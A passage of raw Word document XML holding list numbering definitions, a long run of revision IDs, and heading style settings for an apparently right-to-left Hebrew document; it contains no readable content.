    <w:tmpl w:val="9B0483F2"/>
    <w:lvl w:ilvl="0" w:tplc="1BD4E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F3A20"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="AB7A1082"/>
    <w:lvl w:ilvl="0" w:tplc="076E5AC4">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D58C4"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="362E0E84"/>
    <w:lvl w:ilvl="0" w:tplc="2AE8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80714"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A51A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03D18"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7CFA2118"/>
    <w:lvl w:ilvl="0" w:tplc="AD38C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A30D6"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="709EBF28"/>
    <w:lvl w:ilvl="0" w:tplc="71DA55A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57587A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="EF8A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66D5"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="1E54F1CE"/>
    <w:lvl w:ilvl="0" w:tplc="13FE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E2A39"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="1AE8A96C"/>
    <w:lvl w:ilvl="0" w:tplc="004A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38"/>
  </w:num>
  <w:num w:numId="4">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="5">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="6">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="7">
    <w:abstractNumId w:val="33"/>
  </w:num>
  <w:num w:numId="8">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="9">
    <w:abstractNumId w:val="27"/>
  </w:num>
  <w:num w:numId="10">
    <w:abstractNumId w:val="36"/>
  </w:num>
  <w:num w:numId="11">
    <w:abstractNumId w:val="23"/>
  </w:num>
  <w:num w:numId="12">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="13">
    <w:abstractNumId w:val="29"/>
  </w:num>
  <w:num w:numId="14">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="15">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="16">
    <w:abstractNumId w:val="22"/>
  </w:num>
  <w:num w:numId="17">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="18">
    <w:abstractNumId w:val="24"/>
  </w:num>
  <w:num w:numId="19">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="20">
    <w:abstractNumId w:val="34"/>
  </w:num>
  <w:num w:numId="21">
    <w:abstractNumId w:val="31"/>
  </w:num>
  <w:num w:numId="22">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="23">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="24">
    <w:abstractNumId w:val="20"/>
  </w:num>
  <w:num w:numId="25">
    <w:abstractNumId w:val="32"/>
  </w:num>
  <w:num w:numId="26">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="27">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="28">
    <w:abstractNumId w:val="26"/>
  </w:num>
  <w:num w:numId="29">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="30">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="31">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="32">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="33">
    <w:abstractNumId w:val="28"/>
  </w:num>
  <w:num w:numId="34">
    <w:abstractNumId w:val="25"/>
  </w:num>
  <w:num w:numId="35">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="36">
    <w:abstractNumId w:val="30"/>
  </w:num>
  <w:num w:numId="37">
    <w:abstractNumId w:val="39"/>
  </w:num>
  <w:num w:numId="38">
    <w:abstractNumId w:val="37"/>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91"/>
    <w:rsid w:val="000034EF"/>
    <w:rsid w:val="00007DE2"/>
    <w:rsid w:val="00010589"/>
    <w:rsid w:val="00012D93"/>
    <w:rsid w:val="00015AA0"/>
    <w:rsid w:val="00024058"/>
    <w:rsid w:val="00030551"/>
    <w:rsid w:val="00031A7A"/>
    <w:rsid w:val="00035E1B"/>
    <w:rsid w:val="00044F51"/>
    <w:rsid w:val="000515D3"/>
    <w:rsid w:val="00052126"/>
    <w:rsid w:val="00054945"/>
    <w:rsid w:val="000638FD"/>
    <w:rsid w:val="00063AAF"/>
    <w:rsid w:val="00063E72"/>
    <w:rsid w:val="0006752E"/>
    <w:rsid w:val="00067BD5"/>
    <w:rsid w:val="00074A02"/>
    <w:rsid w:val="00077398"/>
    <w:rsid w:val="0008321C"/>
    <w:rsid w:val="00083A18"/>
    <w:rsid w:val="00084194"/>
    <w:rsid w:val="00092668"/>
    <w:rsid w:val="00093781"/>
    <w:rsid w:val="000946F0"/>
    <w:rsid w:val="00095EE2"/>
    <w:rsid w:val="000A3D4C"/>
    <w:rsid w:val="000B430B"/>
    <w:rsid w:val="000B4F6F"/>
    <w:rsid w:val="000B785B"/>
    <w:rsid w:val="000C0EA2"/>
    <w:rsid w:val="000D4E36"/>
    <w:rsid w:val="000E1DA8"/>
    <w:rsid w:val="000E6794"/>
    <w:rsid w:val="000F41DE"/>
    <w:rsid w:val="000F590B"/>
    <w:rsid w:val="000F7F1E"/>
    <w:rsid w:val="000F7FE4"/>
    <w:rsid w:val="00104B56"/>
    <w:rsid w:val="00104E94"/>
    <w:rsid w:val="00107C1E"/>
    <w:rsid w:val="00112441"/>
    <w:rsid w:val="0011593B"/>
    <w:rsid w:val="00121E53"/>
    <w:rsid w:val="00126A9F"/>
    <w:rsid w:val="00127531"/>
    <w:rsid w:val="001325F5"/>
    <w:rsid w:val="001417CD"/>
    <w:rsid w:val="00142ED1"/>
    <w:rsid w:val="00145853"/>
    <w:rsid w:val="00146055"/>
    <w:rsid w:val="001527B8"/>
    <w:rsid w:val="00153D23"/>
    <w:rsid w:val="0015790B"/>
    <w:rsid w:val="001603D8"/>
    <w:rsid w:val="00166E77"/>
    <w:rsid w:val="001703C3"/>
    <w:rsid w:val="00174A58"/>
    <w:rsid w:val="00176DC8"/>
    <w:rsid w:val="00187CC3"/>
    <w:rsid w:val="00195A0A"/>
    <w:rsid w:val="001A5AAA"/>
    <w:rsid w:val="001B6C04"/>
    <w:rsid w:val="001C07A3"/>
    <w:rsid w:val="001C30DC"/>
    <w:rsid w:val="001C4732"/>
    <w:rsid w:val="001C4E04"/>
    <w:rsid w:val="001D0558"/>
    <w:rsid w:val="001E256D"/>
    <w:rsid w:val="001F1246"/>
    <w:rsid w:val="001F15B8"/>
    <w:rsid w:val="001F53EA"/>
    <w:rsid w:val="00200384"/>
    <w:rsid w:val="00201E3D"/>
    <w:rsid w:val="00203B95"/>
    <w:rsid w:val="00216D2F"/>
    <w:rsid w:val="00217CAE"/>
    <w:rsid w:val="0022383C"/>
    <w:rsid w:val="002328E4"/>
    <w:rsid w:val="002347B3"/>
    <w:rsid w:val="00240447"/>
    <w:rsid w:val="002511DC"/>
    <w:rsid w:val="00257A0A"/>
    <w:rsid w:val="00257A5A"/>
    <w:rsid w:val="00260604"/>
    <w:rsid w:val="00261C44"/>
    <w:rsid w:val="002718D3"/>
    <w:rsid w:val="00272F84"/>
    <w:rsid w:val="00283066"/>
    <w:rsid w:val="00290C50"/>
    <w:rsid w:val="00291DD9"/>
    <w:rsid w:val="002949D1"/>
    <w:rsid w:val="002954CF"/>
    <w:rsid w:val="00296EF2"/>
    <w:rsid w:val="002A0BCE"/>
    <w:rsid w:val="002A7621"/>
    <w:rsid w:val="002B2A58"/>
    <w:rsid w:val="002D416F"/>
    <w:rsid w:val="002D46AC"/>
    <w:rsid w:val="002D6BF0"/>
    <w:rsid w:val="002E1955"/>
    <w:rsid w:val="002E4E53"/>
    <w:rsid w:val="002E624D"/>
    <w:rsid w:val="002F0EFD"/>
    <w:rsid w:val="002F422C"/>
    <w:rsid w:val="003003D4"/>
    <w:rsid w:val="003042C9"/>
    <w:rsid w:val="00305C8D"/>
    <w:rsid w:val="00311F7C"/>
    <w:rsid w:val="00313807"/>
    <w:rsid w:val="003174F0"/>
    <w:rsid w:val="00320C91"/>
    <w:rsid w:val="0032691F"/>
    <w:rsid w:val="00332B18"/>
    <w:rsid w:val="00333FE3"/>
    <w:rsid w:val="00337B3C"/>
    <w:rsid w:val="00342D93"/>
    <w:rsid w:val="00361BC7"/>
    <w:rsid w:val="003656DB"/>
    <w:rsid w:val="00385C97"/>
    <w:rsid w:val="00393BAC"/>
    <w:rsid w:val="003B02F9"/>
    <w:rsid w:val="003B1B63"/>
    <w:rsid w:val="003B3178"/>
    <w:rsid w:val="003B39DC"/>
    <w:rsid w:val="003C3CF0"/>
    <w:rsid w:val="003C574A"/>
    <w:rsid w:val="003D21D2"/>
    <w:rsid w:val="003D4454"/>
    <w:rsid w:val="003E1B53"/>
    <w:rsid w:val="003F1E99"/>
    <w:rsid w:val="003F3C67"/>
    <w:rsid w:val="003F64CE"/>
    <w:rsid w:val="0040064A"/>
    <w:rsid w:val="00401F0E"/>
    <w:rsid w:val="00407466"/>
    <w:rsid w:val="00407B0C"/>
    <w:rsid w:val="00413C64"/>
    <w:rsid w:val="004171DF"/>
    <w:rsid w:val="004178A9"/>
    <w:rsid w:val="004210D1"/>
    <w:rsid w:val="00421A01"/>
    <w:rsid w:val="00423936"/>
    <w:rsid w:val="00424E41"/>
    <w:rsid w:val="004307EB"/>
    <w:rsid w:val="004312B3"/>
    <w:rsid w:val="004352BE"/>
    <w:rsid w:val="00436D64"/>
    <w:rsid w:val="004663E1"/>
    <w:rsid w:val="00470811"/>
    <w:rsid w:val="00471631"/>
    <w:rsid w:val="0047369D"/>
    <w:rsid w:val="004755E0"/>
    <w:rsid w:val="00490249"/>
    <w:rsid w:val="00491276"/>
    <w:rsid w:val="004933C6"/>
    <w:rsid w:val="004937A1"/>
    <w:rsid w:val="00493DB7"/>
    <w:rsid w:val="004A3A19"/>
    <w:rsid w:val="004B35C6"/>
    <w:rsid w:val="004B3699"/>
    <w:rsid w:val="004B7C0E"/>
    <w:rsid w:val="004C58B8"/>
    <w:rsid w:val="004D339A"/>
    <w:rsid w:val="004E1949"/>
    <w:rsid w:val="004F2E8A"/>
    <w:rsid w:val="00500CE6"/>
    <w:rsid w:val="00503CFD"/>
    <w:rsid w:val="0050408D"/>
    <w:rsid w:val="00505010"/>
    <w:rsid w:val="00506AB0"/>
    <w:rsid w:val="00513A44"/>
    <w:rsid w:val="00517753"/>
    <w:rsid w:val="00523ECC"/>
    <w:rsid w:val="005277E6"/>
    <w:rsid w:val="005362B6"/>
    <w:rsid w:val="00540390"/>
    <w:rsid w:val="00542E43"/>
    <w:rsid w:val="00543C1E"/>
    <w:rsid w:val="00544A3E"/>
    <w:rsid w:val="00563E3F"/>
    <w:rsid w:val="0058738B"/>
    <w:rsid w:val="005900EC"/>
    <w:rsid w:val="005A54F6"/>
    <w:rsid w:val="005A7281"/>
    <w:rsid w:val="005B1D01"/>
    <w:rsid w:val="005B30C4"/>
    <w:rsid w:val="005B34F3"/>
    <w:rsid w:val="005B6835"/>
    <w:rsid w:val="005C0529"/>
    <w:rsid w:val="005D25E3"/>
    <w:rsid w:val="005D292C"/>
    <w:rsid w:val="005D6341"/>
    <w:rsid w:val="005D70DB"/>
    <w:rsid w:val="005F4628"/>
    <w:rsid w:val="005F48DA"/>
    <w:rsid w:val="005F667F"/>
    <w:rsid w:val="005F7F77"/>
    <w:rsid w:val="00602898"/>
    <w:rsid w:val="0060388B"/>
    <w:rsid w:val="006109BC"/>
    <w:rsid w:val="0061271A"/>
    <w:rsid w:val="00615479"/>
    <w:rsid w:val="00620EE2"/>
    <w:rsid w:val="00622753"/>
    <w:rsid w:val="0062429F"/>
    <w:rsid w:val="00627700"/>
    <w:rsid w:val="00627FA6"/>
    <w:rsid w:val="006344BF"/>
    <w:rsid w:val="006349B3"/>
    <w:rsid w:val="00637EB9"/>
    <w:rsid w:val="006403FD"/>
    <w:rsid w:val="00640CED"/>
    <w:rsid w:val="0064235A"/>
    <w:rsid w:val="00656E79"/>
    <w:rsid w:val="00666505"/>
    <w:rsid w:val="0067009C"/>
    <w:rsid w:val="0068010E"/>
    <w:rsid w:val="00680BD0"/>
    <w:rsid w:val="00681135"/>
    <w:rsid w:val="00681599"/>
    <w:rsid w:val="006A041E"/>
    <w:rsid w:val="006A2D37"/>
    <w:rsid w:val="006B4C71"/>
    <w:rsid w:val="006B6DC8"/>
    <w:rsid w:val="006C3E25"/>
    <w:rsid w:val="006C55D8"/>
    <w:rsid w:val="006C7E12"/>
    <w:rsid w:val="006D660F"/>
    <w:rsid w:val="006D6CBA"/>
    <w:rsid w:val="006E467E"/>
    <w:rsid w:val="006F28B6"/>
    <w:rsid w:val="006F79CC"/>
    <w:rsid w:val="007028D6"/>
    <w:rsid w:val="007029AC"/>
    <w:rsid w:val="00706BE4"/>
    <w:rsid w:val="00707066"/>
    <w:rsid w:val="007100EE"/>
    <w:rsid w:val="00711382"/>
    <w:rsid w:val="00730238"/>
    <w:rsid w:val="00731468"/>
    <w:rsid w:val="007327B1"/>
    <w:rsid w:val="007422CE"/>
    <w:rsid w:val="0074466F"/>
    <w:rsid w:val="00750463"/>
    <w:rsid w:val="00750DA8"/>
    <w:rsid w:val="00752D67"/>
    <w:rsid w:val="007532AD"/>
    <w:rsid w:val="00756428"/>
    <w:rsid w:val="00761FC9"/>
    <w:rsid w:val="00763638"/>
    <w:rsid w:val="00764F04"/>
    <w:rsid w:val="007738F5"/>
    <w:rsid w:val="0078394D"/>
    <w:rsid w:val="00785F39"/>
    <w:rsid w:val="00787602"/>
    <w:rsid w:val="00793139"/>
    <w:rsid w:val="00796CD0"/>
    <w:rsid w:val="007A0747"/>
    <w:rsid w:val="007A3EDB"/>
    <w:rsid w:val="007A4CB4"/>
    <w:rsid w:val="007A51BA"/>
    <w:rsid w:val="007B0469"/>
    <w:rsid w:val="007B12EA"/>
    <w:rsid w:val="007B37C8"/>
    <w:rsid w:val="007B7DC0"/>
    <w:rsid w:val="007C1515"/>
    <w:rsid w:val="007C22C9"/>
    <w:rsid w:val="007C3148"/>
    <w:rsid w:val="007C4BBB"/>
    <w:rsid w:val="007D01DC"/>
    <w:rsid w:val="007D45E2"/>
    <w:rsid w:val="007D6D59"/>
    <w:rsid w:val="007E7323"/>
    <w:rsid w:val="007F3800"/>
    <w:rsid w:val="007F528B"/>
    <w:rsid w:val="007F562E"/>
    <w:rsid w:val="00810236"/>
    <w:rsid w:val="00811444"/>
    <w:rsid w:val="008168F2"/>
    <w:rsid w:val="008206BE"/>
    <w:rsid w:val="0082431B"/>
    <w:rsid w:val="008249BB"/>
    <w:rsid w:val="0082664D"/>
    <w:rsid w:val="00827178"/>
    <w:rsid w:val="00830ED1"/>
    <w:rsid w:val="00831C1A"/>
    <w:rsid w:val="008427C6"/>
    <w:rsid w:val="00843D47"/>
    <w:rsid w:val="00846A05"/>
    <w:rsid w:val="00851889"/>
    <w:rsid w:val="00856860"/>
    <w:rsid w:val="008652BE"/>
    <w:rsid w:val="008729DA"/>
    <w:rsid w:val="00873129"/>
    <w:rsid w:val="00873196"/>
    <w:rsid w:val="008731DE"/>
    <w:rsid w:val="0087398C"/>
    <w:rsid w:val="00875652"/>
    <w:rsid w:val="0087574C"/>
    <w:rsid w:val="008A4B63"/>
    <w:rsid w:val="008A553B"/>
    <w:rsid w:val="008A6B24"/>
    <w:rsid w:val="008B78CD"/>
    <w:rsid w:val="008C0A37"/>
    <w:rsid w:val="008C6127"/>
    <w:rsid w:val="008D10E7"/>
    <w:rsid w:val="008D1CE3"/>
    <w:rsid w:val="008D1E8E"/>
    <w:rsid w:val="008D612C"/>
    <w:rsid w:val="008E6F6A"/>
    <w:rsid w:val="008E714A"/>
    <w:rsid w:val="008F41BF"/>
    <w:rsid w:val="008F64BD"/>
    <w:rsid w:val="008F784D"/>
    <w:rsid w:val="00901733"/>
    <w:rsid w:val="00903FF6"/>
    <w:rsid w:val="00907AEE"/>
    <w:rsid w:val="00914145"/>
    <w:rsid w:val="009146B3"/>
    <w:rsid w:val="009214EF"/>
    <w:rsid w:val="00924F2E"/>
    <w:rsid w:val="009315CA"/>
    <w:rsid w:val="009321F2"/>
    <w:rsid w:val="00934134"/>
    <w:rsid w:val="00935F3B"/>
    <w:rsid w:val="00936539"/>
    <w:rsid w:val="00971543"/>
    <w:rsid w:val="00973F66"/>
    <w:rsid w:val="00980A45"/>
    <w:rsid w:val="0098135F"/>
    <w:rsid w:val="009813DB"/>
    <w:rsid w:val="0099082A"/>
    <w:rsid w:val="00991E17"/>
    <w:rsid w:val="009951FF"/>
    <w:rsid w:val="009A7475"/>
    <w:rsid w:val="009B59D4"/>
    <w:rsid w:val="009B5C93"/>
    <w:rsid w:val="009C1572"/>
    <w:rsid w:val="009C1DAF"/>
    <w:rsid w:val="009C26A1"/>
    <w:rsid w:val="009C3862"/>
    <w:rsid w:val="009D2302"/>
    <w:rsid w:val="009D569E"/>
    <w:rsid w:val="009D63FB"/>
    <w:rsid w:val="009D6E63"/>
    <w:rsid w:val="009E0F6C"/>
    <w:rsid w:val="009E5FAF"/>
    <w:rsid w:val="009F22B7"/>
    <w:rsid w:val="009F27CF"/>
    <w:rsid w:val="009F5065"/>
    <w:rsid w:val="009F7E27"/>
    <w:rsid w:val="00A04B3A"/>
    <w:rsid w:val="00A142A7"/>
    <w:rsid w:val="00A15699"/>
    <w:rsid w:val="00A1608E"/>
    <w:rsid w:val="00A246E8"/>
    <w:rsid w:val="00A301EA"/>
    <w:rsid w:val="00A3165D"/>
    <w:rsid w:val="00A32F35"/>
    <w:rsid w:val="00A34329"/>
    <w:rsid w:val="00A470BB"/>
    <w:rsid w:val="00A47A9B"/>
    <w:rsid w:val="00A5189D"/>
    <w:rsid w:val="00A542AC"/>
    <w:rsid w:val="00A60326"/>
    <w:rsid w:val="00A72C16"/>
    <w:rsid w:val="00A73496"/>
    <w:rsid w:val="00A76C0E"/>
    <w:rsid w:val="00A77B00"/>
    <w:rsid w:val="00A807F7"/>
    <w:rsid w:val="00A80E39"/>
    <w:rsid w:val="00A8122F"/>
    <w:rsid w:val="00A819CD"/>
    <w:rsid w:val="00A83301"/>
    <w:rsid w:val="00A857C2"/>
    <w:rsid w:val="00A928F9"/>
    <w:rsid w:val="00A94B87"/>
    <w:rsid w:val="00AA5BF9"/>
    <w:rsid w:val="00AB0029"/>
    <w:rsid w:val="00AB0253"/>
    <w:rsid w:val="00AB03B9"/>
    <w:rsid w:val="00AB506A"/>
    <w:rsid w:val="00AB6057"/>
    <w:rsid w:val="00AC067A"/>
    <w:rsid w:val="00AD02FD"/>
    <w:rsid w:val="00AD249B"/>
    <w:rsid w:val="00AD5949"/>
    <w:rsid w:val="00AD76A4"/>
    <w:rsid w:val="00AE491D"/>
    <w:rsid w:val="00AF1CAD"/>
    <w:rsid w:val="00AF31AB"/>
    <w:rsid w:val="00B057EA"/>
    <w:rsid w:val="00B12E21"/>
    <w:rsid w:val="00B178FF"/>
    <w:rsid w:val="00B215E0"/>
    <w:rsid w:val="00B3479C"/>
    <w:rsid w:val="00B40294"/>
    <w:rsid w:val="00B4423E"/>
    <w:rsid w:val="00B456C1"/>
    <w:rsid w:val="00B5401A"/>
    <w:rsid w:val="00B5426F"/>
    <w:rsid w:val="00B54F61"/>
    <w:rsid w:val="00B63484"/>
    <w:rsid w:val="00B643E5"/>
    <w:rsid w:val="00B660A5"/>
    <w:rsid w:val="00B723AF"/>
    <w:rsid w:val="00B766EA"/>
    <w:rsid w:val="00B77243"/>
    <w:rsid w:val="00B92F0D"/>
    <w:rsid w:val="00B9546B"/>
    <w:rsid w:val="00B97F3F"/>
    <w:rsid w:val="00BB26ED"/>
    <w:rsid w:val="00BB3DE3"/>
    <w:rsid w:val="00BB6144"/>
    <w:rsid w:val="00BB7C8F"/>
    <w:rsid w:val="00BB7CF2"/>
    <w:rsid w:val="00BC1034"/>
    <w:rsid w:val="00BC18EA"/>
    <w:rsid w:val="00BC50D2"/>
    <w:rsid w:val="00BD006B"/>
    <w:rsid w:val="00BD506F"/>
    <w:rsid w:val="00BD73AF"/>
    <w:rsid w:val="00BE0C60"/>
    <w:rsid w:val="00BE166A"/>
    <w:rsid w:val="00BF0869"/>
    <w:rsid w:val="00C020A7"/>
    <w:rsid w:val="00C022CA"/>
    <w:rsid w:val="00C07F86"/>
    <w:rsid w:val="00C30E78"/>
    <w:rsid w:val="00C34744"/>
    <w:rsid w:val="00C45389"/>
    <w:rsid w:val="00C54887"/>
    <w:rsid w:val="00C56437"/>
    <w:rsid w:val="00C56736"/>
    <w:rsid w:val="00C57382"/>
    <w:rsid w:val="00C63F54"/>
    <w:rsid w:val="00C76C38"/>
    <w:rsid w:val="00C87296"/>
    <w:rsid w:val="00C872E8"/>
    <w:rsid w:val="00CA057D"/>
    <w:rsid w:val="00CA51D7"/>
    <w:rsid w:val="00CB1818"/>
    <w:rsid w:val="00CB22FF"/>
    <w:rsid w:val="00CB285B"/>
    <w:rsid w:val="00CC3008"/>
    <w:rsid w:val="00CC5912"/>
    <w:rsid w:val="00CD17CC"/>
    <w:rsid w:val="00CD4E10"/>
    <w:rsid w:val="00CE041D"/>
    <w:rsid w:val="00CE5FF7"/>
    <w:rsid w:val="00CF175D"/>
    <w:rsid w:val="00CF2E0C"/>
    <w:rsid w:val="00D0141F"/>
    <w:rsid w:val="00D03CA6"/>
    <w:rsid w:val="00D0543C"/>
    <w:rsid w:val="00D0700A"/>
    <w:rsid w:val="00D10E51"/>
    <w:rsid w:val="00D125A7"/>
    <w:rsid w:val="00D20D9B"/>
    <w:rsid w:val="00D32CA5"/>
    <w:rsid w:val="00D34400"/>
    <w:rsid w:val="00D419E9"/>
    <w:rsid w:val="00D50FB5"/>
    <w:rsid w:val="00D51A4E"/>
    <w:rsid w:val="00D54189"/>
    <w:rsid w:val="00D62C1A"/>
    <w:rsid w:val="00D71299"/>
    <w:rsid w:val="00D716D2"/>
    <w:rsid w:val="00D752CB"/>
    <w:rsid w:val="00D77396"/>
    <w:rsid w:val="00D84A9C"/>
    <w:rsid w:val="00D86833"/>
    <w:rsid w:val="00D8750F"/>
    <w:rsid w:val="00D9077C"/>
    <w:rsid w:val="00D97F25"/>
    <w:rsid w:val="00DA1130"/>
    <w:rsid w:val="00DA39C5"/>
    <w:rsid w:val="00DA4192"/>
    <w:rsid w:val="00DA514C"/>
    <w:rsid w:val="00DA6613"/>
    <w:rsid w:val="00DB0E40"/>
    <w:rsid w:val="00DB256F"/>
    <w:rsid w:val="00DB44CB"/>
    <w:rsid w:val="00DC1203"/>
    <w:rsid w:val="00DC2726"/>
    <w:rsid w:val="00DC4C95"/>
    <w:rsid w:val="00DD0EC2"/>
    <w:rsid w:val="00DE0C99"/>
    <w:rsid w:val="00DE22FA"/>
    <w:rsid w:val="00DE64CB"/>
    <w:rsid w:val="00DF0DBC"/>
    <w:rsid w:val="00E05C6A"/>
    <w:rsid w:val="00E05EE7"/>
    <w:rsid w:val="00E15D69"/>
    <w:rsid w:val="00E2238E"/>
    <w:rsid w:val="00E2361E"/>
    <w:rsid w:val="00E26298"/>
    <w:rsid w:val="00E30B9F"/>
    <w:rsid w:val="00E33B5A"/>
    <w:rsid w:val="00E35961"/>
    <w:rsid w:val="00E4025C"/>
    <w:rsid w:val="00E41114"/>
    <w:rsid w:val="00E46642"/>
    <w:rsid w:val="00E57A3A"/>
    <w:rsid w:val="00E61E21"/>
    <w:rsid w:val="00E61EDB"/>
    <w:rsid w:val="00E63EAE"/>
    <w:rsid w:val="00E6462F"/>
    <w:rsid w:val="00E652DD"/>
    <w:rsid w:val="00E6768E"/>
    <w:rsid w:val="00E74EE3"/>
    <w:rsid w:val="00E80BE0"/>
    <w:rsid w:val="00E811B5"/>
    <w:rsid w:val="00E827C9"/>
    <w:rsid w:val="00E9453A"/>
    <w:rsid w:val="00E94580"/>
    <w:rsid w:val="00E95EF8"/>
    <w:rsid w:val="00E96F80"/>
    <w:rsid w:val="00E97A9C"/>
    <w:rsid w:val="00EA1401"/>
    <w:rsid w:val="00EA5E13"/>
    <w:rsid w:val="00EB0C23"/>
    <w:rsid w:val="00EB398B"/>
    <w:rsid w:val="00EB47A6"/>
    <w:rsid w:val="00EB5DC4"/>
    <w:rsid w:val="00EC3531"/>
    <w:rsid w:val="00EC4746"/>
    <w:rsid w:val="00EC7D6D"/>
    <w:rsid w:val="00ED34C1"/>
    <w:rsid w:val="00EE12A0"/>
    <w:rsid w:val="00EE7BF4"/>
    <w:rsid w:val="00EF06BD"/>
    <w:rsid w:val="00F10D33"/>
    <w:rsid w:val="00F15BF0"/>
    <w:rsid w:val="00F22668"/>
    <w:rsid w:val="00F3265E"/>
    <w:rsid w:val="00F33835"/>
    <w:rsid w:val="00F347EE"/>
    <w:rsid w:val="00F50040"/>
    <w:rsid w:val="00F5660C"/>
    <w:rsid w:val="00F62A08"/>
    <w:rsid w:val="00F6780D"/>
    <w:rsid w:val="00F74EE5"/>
    <w:rsid w:val="00F766FD"/>
    <w:rsid w:val="00F85986"/>
    <w:rsid w:val="00F93445"/>
    <w:rsid w:val="00F94EEA"/>
    <w:rsid w:val="00FA0BB0"/>
    <w:rsid w:val="00FA10A0"/>
    <w:rsid w:val="00FA6B79"/>
    <w:rsid w:val="00FB3964"/>
    <w:rsid w:val="00FB7538"/>
    <w:rsid w:val="00FC25A0"/>
    <w:rsid w:val="00FD3529"/>
    <w:rsid w:val="00FE0099"/>
    <w:rsid w:val="00FE0D21"/>
    <w:rsid w:val="00FE3BA9"/>
    <w:rsid w:val="00FE59A2"/>
    <w:rsid w:val="00FF553B"/>
    <w:rsid w:val="00FF695D"/>
    <w:rsid w:val="00FF6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D4B5"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{6AEB09A4-B7BF-4672-A2BB-7EEA273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7323"/>
    <w:pPr>
      <w:bidi/>
      <w:spacing w:line="360" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cs="David"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:link w:val="10"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="00827178"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="240" w:after="0"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:iCs/>
      <w:sz w:val="32"/>
      <w:szCs w:val="40"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="2">
    <w:name w:val="heading 2"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:link w:val="20"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00827178"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="40" w:after="0"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:bCs/>
      <w:iCs/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
      <w:sz w:val="26"/>
      <w:szCs w:val="32"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="3">
    <w:name w:val="heading 3"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:link w:val="30"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00BB6144"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="40" w:after="0"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:bCs/>
      <w:iCs/>
      <w:color w:val="1F3763" w:themeColor="accent1" w:themeShade="7F"/>
      <w:sz w:val="24"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="4">
    <w:name w:val="heading 4"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:link w:val="40"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00ED34C1"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="40" w:after="0"/>
      <w:outlineLvl w:val="3"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:bCs/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="5">
    <w:name w:val="heading 5"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
